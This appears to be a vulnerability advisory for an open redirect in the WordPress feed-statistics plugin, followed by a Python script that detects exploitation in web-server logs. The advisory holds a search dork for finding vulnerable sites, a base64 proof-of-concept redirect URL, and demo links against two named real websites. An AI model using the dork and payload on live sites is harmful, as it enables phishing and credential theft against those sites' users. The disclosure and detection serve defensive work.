WordPress Feed-Statistics 4.1 Open Redirect
Posted on 21 December 2017
[+] Title: WordPress feed-statistics Plugin Open Redirect Vulnerability
[+] Date: 2017-12-20
[+] Author: Mostafa Gharzi
[+] Vendor Homepage: www.WordPress.org
[+] Tested on: Windows 10 & Kali Linux
[+] Vulnerable File: /feed-statistics.php?url=
[+] Vulnerable Parameter: url (GET method)
[+] Dork: inurl:/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=

### Notes:

An unvalidated redirect vulnerability in the feed-statistics plugin for WordPress occurs because the application accepts untrusted input and redirects the request to the URL contained within that input. By modifying the URL to point at a malicious site, an attacker can launch a phishing attack and steal user credentials.

### URL Encoded by Base64:

[+] Example: https://www.google.com/ ==> Base64 Algorithm ==> aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=

### POC:

[+] http://Site/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=[URL Encoded by Base64]

### Demo:

[+] http://blog.caplin.com/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=
[+] http://fabianferber.de/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=

### Special Thanks:

[+] CertCC.ir
[+] Gucert.ir
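As an added detection example (not part of the advisory or the plugin's own code), the following script scans web-server access logs for requests to the vulnerable endpoint, base64-decodes the `url` parameter the way the server would see it, and flags redirects whose target host is not on the site's own allowlist. The allowed hosts, the log lines and the log format are constructed assumptions.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Hosts this site may legitimately redirect to (constructed assumption).
ALLOWED_HOSTS = {"blog.example.org", "www.example.org"}

# Vulnerable endpoint path named in the advisory.
ENDPOINT = "/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php"

# Combined-log-format request line (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_redirect_target(raw):
    """Decode the base64 'url' value; return None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8")
    except (binascii.Error, ValueError):
        return None


def classify_log_line(line, allowed_hosts=ALLOWED_HOSTS):
    """Return ('external'|'internal'|'undecodable', detail) for feed-statistics
    redirect requests, or None for unrelated log lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != ENDPOINT:
        return None
    # parse_qs percent-decodes and maps '+' to space, as PHP's $_GET does.
    raw = parse_qs(parts.query).get("url")
    if not raw:
        return None
    target = decode_redirect_target(raw[0])
    if target is None:
        return ("undecodable", raw[0])
    host = (urlsplit(target).hostname or "").lower()
    # No host means a relative redirect, which stays on-site.
    if host == "" or host in allowed_hosts:
        return ("internal", host)
    return ("external", host)


def scan_log(lines):
    """Return (ip, target host) pairs for every off-site redirect request."""
    hits = []
    for line in lines:
        result = classify_log_line(line)
        if result and result[0] == "external":
            hits.append((LOG_RE.match(line).group("ip"), result[1]))
    return hits
```

Run it over a constructed line such as `203.0.113.5 - - [20/Dec/2017:10:00:00 +0000] "GET /wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8= HTTP/1.1" 302 0` and `scan_log` reports the off-site target `www.google.com` for that client.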